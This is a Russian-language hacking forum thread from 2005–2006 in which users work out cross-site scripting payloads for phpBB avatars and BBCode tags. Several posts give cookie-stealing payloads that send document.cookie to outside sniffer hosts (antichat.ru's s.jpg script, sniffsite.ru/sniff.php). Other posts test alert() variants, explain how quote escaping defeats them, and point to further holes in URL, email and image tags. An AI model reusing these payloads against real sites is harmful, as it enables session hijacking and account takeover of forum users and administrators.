Форумы XSS в phpBB

Discussion in 'Уязвимости CMS/форумов' started by zFlex, 27 Dec 2004.

  1. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    А так проходит?
    Code:
      http://www.smailiki.nm.ru/lam/lam4.gif[color=Red]`[/color] bb=[color=Red]`[/color]http://antichat.ru/cgi-bin/s.jpg?[color=Red]`[/color] style=[color=Red]`[/color]background:url(javascript:document.images[0].src=this.bb+document.cookie)
       
     
    #21 Че Гевара, 15 Jan 2005
    Last edited: 15 Jan 2005
  2. b00

    b00 New Member

    Joined:
    15 Jan 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    такая длинная конструкция - нет :)
    <img src="http://aaa.bb/x.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:documen" alt="" /><br />

    Да и админы уже года 2 IE не юзают :cool:
     
  3. b00

    b00 New Member

    Joined:
    15 Jan 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    загнал в аватар тестовую строку
    <img src="http://abc.ru/x.gif` style=`background:url(javascript:alert())" alt="" border="0" /><br /><br />

    в IE не отработало
     
  4. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Он и не сработает ... Я что-то перемудрил по ходу дела....
    По идее, сработает он в таком случае:
    Code:
     <img src="http://abc.ru/x.gif"style=background-image:url(javascript:alert()) alt="" border="0">
     
    Но т.к. кавычки преобразуются, то он тоже не сработает ...)
    Сейчас подумаем еще ...
     
  5. SHiTS

    SHiTS КУЛХАЦКЕР

    Joined:
    11 Dec 2004
    Messages:
    186
    Likes Received:
    15
    Reputations:
    0
    вот смотрю на вас и не знаю че сказать...
     
  6. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Как бы Егор меня не путал, по идее оба скрипта синтаксически верны:
    Code:
         <img src=[color=Red]"[/color]http://abc.ru/x.gif[color=Red]"[/color]style=background-image:url(javascript:alert('1')) alt="" border="0">
         <img src=[color=Red]`[/color]http://abc.ru/x.gif[color=Red]`[/color]style=background-image:url(javascript:alert('2')) alt="" border="0">
         
    И вот в чем была моя ошибка и чего я не учел:
    Аватара отображается как
    Code:
         <img src=[color=Lime]"[/color]http:/site/1.jpg[color=Lime]"[/color] alt="" border="0" />
         
    И само собой разумеется, что я предложил синтаксически неверно (в нашем случае):
    Code:
          http://www.smailiki.nm.ru/lam/lam4.gif[color=Lime]`[/color] bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)
         
    Все это преобразуется в <img src=" http://www.smailiki.nm.ru/lam/lam4.gif` .... ... что является галиматьей полной и естесственно не сработает ...
    Получается - раз кавычки преобразуются в &quot; , то за пределы <img src="... никуда не выйти ...

    Извиняюсь за свою ошибку - просто я не вчитался в тему ...
     
    #26 Че Гевара, 15 Jan 2005
    Last edited: 15 Jan 2005
  7. b00

    b00 New Member

    Joined:
    15 Jan 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ничего, со всякими случается.
     
  8. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    Не работает...
    пишет:
    Файл по указанному вами Url не содержит данных
    чё не так?...
     
  9. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    да, попадается...
    может на новых версиях не рубит фишка?
     
  10. san40

    san40 New Member

    Joined:
    31 Jan 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Дак а какой вариант верный??? :)
     
  11. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[0].src="http://www.sniffsite.ru/sniff.php?"+document.cookie) [/COLOR]
     
  12. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    вставить можно на некоторых форумах, названия не скажу, эта информация недоступна для таких бухал как ты...
     
  13. Fr1k

    Fr1k Elder - Старейшина

    Joined:
    11 Jun 2004
    Messages:
    252
    Likes Received:
    4
    Reputations:
    0
    Нда ... круто!!!
     
  14. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    скоро бои устраивать будем =))
    да не, чел нормльный вроде, вот как закончит прикалываться, можно даже общаться с ним....
     
  15. Ricky

    Ricky Banned

    Joined:
    4 Jan 2006
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Речь шла о пхпбб, а не о Инвизион.
     
    1 person likes this.
  16. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    wj, прикрыли твои уязвимости в пхпбб. пора новые делать, пусть 20 ю выпускают. )) когда первые заплатки написали, все проходило в другом регистре (URL). а теперь не прокатывает. хотя не знаю как в других форумах, а в пхпбб все хсс можно через админку прикрыть, не меняя кода. но этого никто не делал.
     
    #36 syntacsis, 5 Jan 2006
    Last edited: 5 Jan 2006
  17. Ricky

    Ricky Banned

    Joined:
    4 Jan 2006
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Знаю что прикрыли, по этому Я уже прибежал на помощь. Замените мой второй тег урл, на тег мыла.

    Так же есть уязвимость в теге картинки.
     
    #37 Ricky, 5 Jan 2006
    Last edited: 5 Jan 2006